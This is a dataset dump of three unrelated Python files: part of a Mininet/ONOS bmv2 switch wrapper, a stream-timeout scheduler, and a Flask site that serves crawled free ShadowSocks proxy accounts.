if self.valgrind:
bmv2Args = VALGRIND_PREFIX.split() + bmv2Args
return " ".join(bmv2Args)
def getStratumCmdString(self, config_dir):
stratumRoot = getStratumRoot()
args = [
stratumRoot + STRATUM_BINARY,
'-device_id=%d' % self.p4DeviceId,
'-chassis_config_file=%s' % self.chassisConfigFile,
'-forwarding_pipeline_configs_file=/dev/null',
'-persistent_config_dir=' + config_dir,
'-initial_pipeline=' + stratumRoot + STRATUM_INIT_PIPELINE,
'-cpu_port=%s' % self.cpuPort,
'-external_hercules_urls=0.0.0.0:%d' % self.grpcPort,
'-local_hercules_url=localhost:%d' % self.grpcPortInternal,
'-bmv2_thrift_port=%d' % self.thriftPort,
'-bmv2_log_level=%s' % self.loglevel,
'-max_num_controllers_per_node=10',
'-write_req_log_file=/dev/null'
]
return " ".join(args)
def bmv2Args(self):
args = ['--device-id %s' % str(self.p4DeviceId)]
for port, intf in self.intfs.items():
if not intf.IP():
args.append('-i %d@%s' % (port, intf.name))
args.append('--thrift-port %s' % self.thriftPort)
if self.notifications:
ntfaddr = 'ipc:///tmp/bmv2-%s-notifications.ipc' % self.name
args.append('--notifications-addr %s' % ntfaddr)
if self.elogger:
nanologaddr = 'ipc:///tmp/bmv2-%s-nanolog.ipc' % self.name
args.append('--nanolog %s' % nanologaddr)
if self.debugger:
dbgaddr = 'ipc:///tmp/bmv2-%s-debug.ipc' % self.name
args.append('--debugger-addr %s' % dbgaddr)
args.append('--log-console')
if self.pktdump:
args.append('--pcap --dump-packet-data %s' % PKT_BYTES_TO_DUMP)
args.append('-L%s' % self.loglevel)
if not self.json:
args.append('--no-p4')
else:
args.append(self.json)
# gRPC target-specific options
args.append('--')
args.append('--cpu-port %s' % self.cpuPort)
args.append('--grpc-server-addr 0.0.0.0:%s' % self.grpcPort)
return args
def waitBmv2Start(self):
# Wait for switch to open gRPC port, before sending ONOS the netcfg.
# Include time-out just in case something hangs.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
endtime = time.time() + SWITCH_START_TIMEOUT
while True:
port = self.grpcPortInternal if self.grpcPortInternal else self.grpcPort
result = sock.connect_ex(('localhost', port))
if result == 0:
# No new line
sys.stdout.write("⚡️ %s @ %d" % (self.targetName, self.bmv2popen.pid))
sys.stdout.flush()
# The port is open. Let's go! (Close socket first)
sock.close()
break
# Port is not open yet. If there is time, we wait a bit.
if endtime > time.time():
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(0.05)
else:
# Time's up.
raise Exception("Switch did not start before timeout")
def printBmv2Log(self):
if os.path.isfile(self.logfile):
print "-" * 80
print "%s log (from %s):" % (self.name, self.logfile)
with open(self.logfile, 'r') as f:
lines = f.readlines()
if len(lines) > BMV2_LOG_LINES:
print "..."
for line in lines[-BMV2_LOG_LINES:]:
print line.rstrip()
@staticmethod
def controllerIp(controllers):
try:
# onos.py
clist = controllers[0].nodes()
except AttributeError:
clist = controllers
assert len(clist) > 0
return random.choice(clist).IP()
def killBmv2(self, log=False):
self.stopped = True
if self.bmv2popen is not None:
self.bmv2popen.terminate()
self.bmv2popen.wait()
self.bmv2popen = None
if self.logfd is not None:
if log:
self.logfd.write("*** PROCESS TERMINATED BY MININET ***\n")
self.logfd.close()
self.logfd = None
def cleanupTmpFiles(self):
self.cmd("rm -rf /tmp/bmv2-%s-*" % self.name)
def stop(self, deleteIntfs=True):
"""Terminate switch."""
self.killBmv2(log=True)
Switch.stop(self, deleteIntfs)
class ONOSStratumSwitch(ONOSBmv2Switch):
def __init__(self, name, **kwargs):
kwargs["stratum"] = True
super(ONOSStratumSwitch, self).__init__(name, **kwargs)
# Exports for bin/mn
switches = {
'onosbmv2': ONOSBmv2Switch,
'stratum': ONOSStratumSwitch,
}
hosts = {'onoshost': ONOSHost}
|
Scheduler.py | import datetime
import time
from multiprocessing import Process
import json
from src.application_management.CompletenessConstraint import CompletenessConstraint
from src.application_management.StaticTimeout import StaticTimeout
from src.application_management.Publisher import Publisher
# invoked when a process times out, associated with an individual packet arrival
# requirement is a static timeout or constraint
def onTimeout(requirement, timeout, updater, publisher, network_monitor, below_constraint = None):
time.sleep(float(timeout))
timestamp = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')
timestamp = json.dumps(timestamp, indent=4, sort_keys=True)
timestamp = timestamp.strip('"')
if (isinstance(requirement, CompletenessConstraint)):
completeness = network_monitor.notifyTimeoutForConstraint(requirement.getDeviceKey(), requirement.getCompleteness().rstrip()).text
print('timeout completeness:' + completeness)
else:
completeness = network_monitor.notifyTimeoutForStaticTimeout(requirement.getDeviceKey(), requirement.getTimeout()).text
print('timeout completeness:' + completeness)
if below_constraint != None and below_constraint[requirement.getCompleteness()] != None:
if below_constraint[requirement.getCompleteness().rstrip()] < requirement.getThreshold():
if requirement.getRemoteObject() != None:
print(datetime.datetime.now(), '| [Scheduler]:',
'Violation occurred prior packet arrival. Invoking onTimeout().')
updater.onViolation(requirement.getRemoteObject(), completeness.rstrip(), timeout, timestamp)
else:
print(datetime.datetime.now(), '| [Scheduler]:',
'Violation occurred prior packet arrival. Invoking onViolationt() on Publisher.')
publisher.onViolation(requirement.getID(), requirement.getDeviceKey(), None, completeness.rstrip(), timeout, timestamp)
else:
if requirement.getRemoteObject() != None:
print(datetime.datetime.now(), '| [Scheduler]:',
'Timeout occurred prior packet arrival. Invoking onTimeout() on Updater.')
updater.onTimeout(requirement.getRemoteObject(), completeness.rstrip(), timeout, timestamp)
else:
print(datetime.datetime.now(), '| [Scheduler]:',
'Timeout occurred prior packet arrival. Invoking onTimeout() on Publisher.')
publisher.onTimeout(requirement.getID(), requirement.getDeviceKey(), completeness.rstrip(), timeout, timestamp)
else:
if requirement.getRemoteObject() != None:
updater.onTimeout(requirement.getRemoteObject(), completeness.rstrip(), timeout, timestamp)
else:
publisher.onTimeout(requirement.getID(), requirement.getDeviceKey(), completeness.rstrip(), timeout, timestamp)
# Responsible for coordinating callback methods of (remote) application objects,
# based on packet arrival times and timeouts.
class Scheduler:
# used for unique IDs of ApplicationConstraint objects.
# both an ApplicationConstraint and the corresponding Process share the same ID.
constraint_counter = 0
# used for unique IDs of StaticTimeout objects.
# both a StaticTimeout and the corresponding Process share the same ID.
static_timeout_counter = 0
def __init__(self, updater, publisher, data_parser, network_monitor):
self.updater = updater
self.publisher = publisher
self.data_parser = data_parser
self.data_parser.setScheduler(self)
self.network_monitor = network_monitor
self.constraints = []
# ApplicationConstraint.id : process
self.constraint_to_process = dict()
# static timeouts
self.timeouts = []
# StaticTimeout.id : process
self.timeout_to_process = dict()
# used to determine ID of registered constraints / static timeouts.
self.registration_id = 0
def getUpdater(self):
return self.updater
def getDataParser(self):
return self.data_parser
# register completeness constraint for device key
# returns unique ID to identify websocket notifications for this registration
def registerCompleteness(self, device, pid1, pid2, measurement, completeness_constraint, threshold, remote_object=None):
constraint = CompletenessConstraint(self.registration_id, pid1, pid2, device, measurement, completeness_constraint, threshold, remote_object)
self.constraints.append(constraint)
self.constraint_to_process[self.registration_id] = None
key = pid1 + '/' + pid2 + ':' + device + '|' + measurement
self.network_monitor.trackCompletenessConstraintForStream(key, completeness_constraint)
self.network_monitor.activateDataSource(key)
#self.constraint_counter += 1
self.registration_id +=1
return self.registration_id - 1
# register static timeout for device key
# returns unique ID to identify websocket notifications for this registration
def registerTimeOut(self, device, pid1, pid2, measurement, timeout, remote_object=None):
static_timeout = StaticTimeout(self.registration_id, pid1, pid2, device, measurement, timeout, remote_object)
key = pid1 + '/' + pid2 + ':' + device + '|' + measurement
self.timeouts.append(static_timeout)
self.timeout_to_process[self.registration_id] = None
self.network_monitor.trackStaticTimeoutForStream(key, timeout)
self.network_monitor.activateDataSource(key)
#self.static_timeout_counter += 1
self.registration_id +=1
return self.registration_id - 1
# when timeout has occured, the scheduler waits for the next packet arrival before restarting a new timeout process.
def receiveData(self, arrival_time, time_generated, key, value, next_timeout, achieved_completeness_constraints, above_constraint, achieved_completeness_timeouts, timestamp):
print(datetime.datetime.now(), '| [Scheduler]:', 'Received data from:', key, ', at', arrival_time, ' with timestamp generated', time_generated)
# check registered completeness constraints that are linked to received device data
for constraint in self.constraints:
if constraint.sameKey(key):
print(datetime.datetime.now(), '| [Scheduler]:', 'ApplicationConstraint', constraint.getDeviceKey())
process = self.constraint_to_process[constraint.getID()]
if process != None:
if process.is_alive():
print(datetime.datetime.now(), '| [Scheduler]: packet received prior timeout. Terminating timeout Process.')
self.constraint_to_process[constraint.getID()].terminate()
# check if violation
if above_constraint[constraint.getCompleteness()] != None:
if above_constraint[constraint.getCompleteness()] < constraint.getThreshold():
if constraint.getRemoteObject() != None:
print(datetime.datetime.now(),
'| [Scheduler]: constraint violation detected. Invoking onViolation() on Updater.')
self.updater.onViolation(constraint.getRemoteObject(), value, achieved_completeness_constraints[constraint.getCompleteness()], next_timeout[constraint.getCompleteness()], timestamp)
else:
print(datetime.datetime.now(),
'| [Scheduler]: constraint violation detected. Invoking onViolation() on Publisher.')
self.publisher.onViolation(constraint.getID(), key, value, achieved_completeness_constraints[constraint.getCompleteness()], next_timeout[constraint.getCompleteness()], timestamp)
else:
if constraint.getRemoteObject() != None:
print(datetime.datetime.now(),
'| [Scheduler]: constraint satisfaction. Invoking onNext() on Updater.')
self.updater.onNext(constraint.getRemoteObject(), value, achieved_completeness_constraints[constraint.getCompleteness()],next_timeout[constraint.getCompleteness()], timestamp)
else:
print(datetime.datetime.now(),
'| [Scheduler]: constraint satisfaction. Invoking onNext() on Publisher.')
self.publisher.onNext(constraint.getID(), key, value, achieved_completeness_constraints[constraint.getCompleteness()], next_timeout[constraint.getCompleteness()], timestamp)
else:
if constraint.getRemoteObject() != None:
print(datetime.datetime.now(),
'| [Scheduler]: constraint satisfaction. Invoking onNext() on Updater.')
self.updater.onNext(constraint.getRemoteObject(), value,
achieved_completeness_constraints[constraint.getCompleteness()],
next_timeout[constraint.getCompleteness()], timestamp)
else:
print(datetime.datetime.now(),
'| [Scheduler]: constraint satisfaction. Invoking onNext() on Publisher.')
self.publisher.onNext(constraint.getID(), key, value,
achieved_completeness_constraints[constraint.getCompleteness()],
next_timeout[constraint.getCompleteness()], timestamp)
else:
if constraint.getRemoteObject() != None:
print(datetime.datetime.now(),
'| [Scheduler]: constraint satisfaction. Invoking onNext() on Updater.')
print('next timeout',next_timeout[constraint.getCompleteness()])
self.updater.onNext(constraint.getRemoteObject(), value,
achieved_completeness_constraints[constraint.getCompleteness()],
next_timeout[constraint.getCompleteness()], timestamp)
else:
print(datetime.datetime.now(),
'| [Scheduler]: constraint satisfaction. Invoking onNext() on Publisher.')
self.publisher.onNext(constraint.getID(), key, value,
achieved_completeness_constraints[constraint.getCompleteness()], next_timeout[constraint.getCompleteness()], timestamp)
completeness = constraint.getCompleteness()
print(datetime.datetime.now(), '| [Scheduler]: Initiating new timeout Process with a timeout of', next_timeout[completeness], 'seconds.')
p = Process(target=onTimeout, args=(constraint, next_timeout[completeness],
self.updater, self.publisher, self.network_monitor, above_constraint))
self.constraint_to_process[constraint.getID()] = p
p.start()
# check registered static timeouts that are linked to received device data
for st in self.timeouts:
if st.sameKey(key):
print(datetime.datetime.now(), '| [Scheduler]:', 'StaticTimeout', st.getDeviceKey())
process = self.timeout_to_process[st.getID()]
if process != None:
# if timeout hasn't occured yet, stop timer and call on_next
if process.is_alive():
print(datetime.datetime.now(), '| [Scheduler]: packet received prior timeout. Terminating timeout Process.')
self.timeout_to_process[st.getID()].terminate()
if st.getRemoteObject() != None:
print(datetime.datetime.now(), '| [Scheduler]: Invoking onNext() on Updater.')
self.updater.onNext(st.getRemoteObject(), value,
achieved_completeness_timeouts[st.getTimeout()],
float(st.getTimeout()), timestamp)
else:
print(datetime.datetime.now(), '| [Scheduler]: Invoking onNext() on Publisher.')
self.publisher.onNext(st.getID(), key, value,
achieved_completeness_timeouts[st.getTimeout()], float(st.getTimeout()), timestamp)
else:
# first packet arrival, no process yet
if st.getRemoteObject()!=None:
print(datetime.datetime.now(), '| [Scheduler]: Invoking onNext() on Updater.')
self.updater.onNext(st.getRemoteObject(), value,
achieved_completeness_timeouts[st.getTimeout()],
float(st.getTimeout()), timestamp)
else:
print(datetime.datetime.now(), '| [Scheduler]: Invoking onNext() on Publisher.')
self.publisher.onNext(st.getID(), key, value,
achieved_completeness_timeouts[st.getTimeout()], float(st.getTimeout()),timestamp)
print(datetime.datetime.now(), '| [Scheduler]: Initiating new timeout Process with a timeout of', st.getTimeout(), 'seconds.')
p = Process(target=onTimeout, args=(st, float(st.getTimeout()), self.updater, self.publisher, self.network_monitor))
self.timeout_to_process[st.getID()] = p
p.start()
|
views.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import random
import logging
import time
import threading
import os
from ssshare import app
from ssshare.ascii import birthday_2017, ss_title
from ssshare.ss import crawler
from ssshare import donation
from flask import render_template, send_from_directory, abort
from apscheduler.schedulers.background import BackgroundScheduler
# Config for disqus comment board
DOMAIN = 'http://ss.pythonic.life'
DISQUS_IDENTIFIER = 'shadowsocksshare'
servers = [{'data': [], 'info': {'message': '别着急,正在爬数据,十分钟后再回来吧:)', 'url': 'http://ss.pythonic.life', 'name': '免费 ShadowSocks 账号分享'}}]
curtime = time.ctime()
encoded = ''
full_encoded = ''
jsons = list()
full_jsons = list()
scheduler = BackgroundScheduler()
def update_servers():
try:
# servers
global servers
servers = crawler.main()
# subscription
global encoded
global full_encoded
global jsons
global full_jsons
jsons = list()
decoded = list()
full_decoded = list()
for website in servers:
for server in website['data']:
full_decoded.append(server['ssr_uri'])
full_jsons.append(server['json'])
if server['status'] > 0:
decoded.append(server['ssr_uri'])
jsons.append(server['json'])
decoded = '\n'.join(decoded)
encoded = base64.urlsafe_b64encode(bytes(decoded, 'utf-8'))
full_decoded = '\n'.join(full_decoded)
full_encoded = base64.urlsafe_b64encode(bytes(full_decoded, 'utf-8'))
time.sleep(7200)
except Exception as e:
logging.exception(e, stack_info=True)
# counter_path = os.path.expanduser('/tmp/counter')
counter_path = 'memory'
count = 0
def counter(counter_path=counter_path, update=True):
if update:
if counter_path == 'memory':
global count
count += 1
else:
if not os.path.exists(os.path.split(counter_path)[0]):
os.makedirs(os.path.split(counter_path)[0])
if not os.path.exists(counter_path):
open(counter_path, 'w').write('0')
count = int(open(counter_path).readline())
open(counter_path, 'w').write(str(count + 1))
return count
@app.route('/')
def index():
try:
return render_template(
'index.html',
servers=servers,
ss=ss_title[random.randint(0, len(ss_title) - 1)],
counter=counter(),
ctime=curtime,
PAGE_URL=DOMAIN + '/',
PAGE_IDENTIFIER='shadowsocksshare'
)
except Exception as e:
logging.exception(e, stack_info=True)
@app.route('/full')
def full():
try:
return render_template(
'full.html',
servers=servers,
ss=ss_title[random.randint(0, len(ss_title) - 1)],
counter=counter(),
ctime=curtime,
)
except Exception as e:
logging.exception(e, stack_info=True)
@app.route('/<string:path>')
def pages(path):
print(path)
try:
a, b = path.split('-')
a, b = int(a), int(b)
except Exception:
abort(404)
if a >= len(servers):
abort(404)
elif b >= len(servers[a]['data']):
abort(404)
try:
uri = servers[a]['data'][b].get('decoded_url', '')
remarks = servers[a]['data'][b].get('remarks', 'None')
server = servers[a]['data'][b].get('server', 'None')
server_port = servers[a]['data'][b].get('server_port', 'None')
password = servers[a]['data'][b].get('password', 'None')
method = servers[a]['data'][b].get('method', 'None')
ssr_protocol = servers[a]['data'][b].get('ssr_protocol', 'None')
obfs = servers[a]['data'][b].get('obfs', 'None')
href = servers[a]['data'][b].get('href', 'None')
json = servers[a]['data'][b].get('json', 'None')
obfsparam = servers[a]['data'][b].get('obfsparam', 'None')
protoparam = servers[a]['data'][b].get('protoparam', 'None')
status = servers[a]['data'][b].get('status', 'None')
content = servers[a]['data'][b].get('content', 'None')
return render_template(
'pages.html',
uri=uri,
server=server,
server_port=server_port,
password=password,
method=method,
ssr_protocol=ssr_protocol,
obfs=obfs,
href=href,
remarks=remarks,
counter=counter(),
server_data=servers[a]['data'][b],
json=json,
obfsparam=obfsparam,
protoparam=protoparam,
status=status,
content=content,
)
except Exception as e:
logging.exception(e, stack_info=True)
@app.route('/html/<path:path>')
def static_html(path):
try:
return render_template(path, )
except Exception as e:
logging.exception(e)
abort(404)
@app.route('/donation')
def html_donation():
try:
return render_template(
'donate.html',
data=donation.data,
sum_people=donation.sum_people,
sum_money=donation.sum_money,
)
except Exception as e:
logging.exception(e)
abort(404)
@app.route('/subscribe')
def subscribe():
counter('', False)
return encoded
@app.route('/full/subscribe')
def full_subscribe():
counter('', False)
return full_encoded
@app.route('/json')
def subscribe_json():
counter('', False)
return '{}' if len(jsons) == 0 else random.sample(jsons, 1)[0]
@app.route('/full/json')
def full_subscribe_json():
counter('', False)
return '{}' if len(jsons) == 0 else random.sample(full_jsons, 1)[0]
@app.route('/js/<path:path>')
def send_jsadfsadfs(path):
return send_from_directory('js', path)
@app.route('/static/<path:path>')
def send_static(path):
return send_from_directory('static', path)
@app.route('/favicon.ico')
def send_favicon():
return send_from_directory('static', 'favicon.ico')
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html', ), 404
@app.route('/gift')
def gift():
return birthday_2017
def start():
update_thread = threading.Thread(target=update_servers)
scheduler.add_job(update_servers, "cron", minute=random.randint(1, 15), second=random.randint(0, 59))
update_thread.start()
scheduler.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.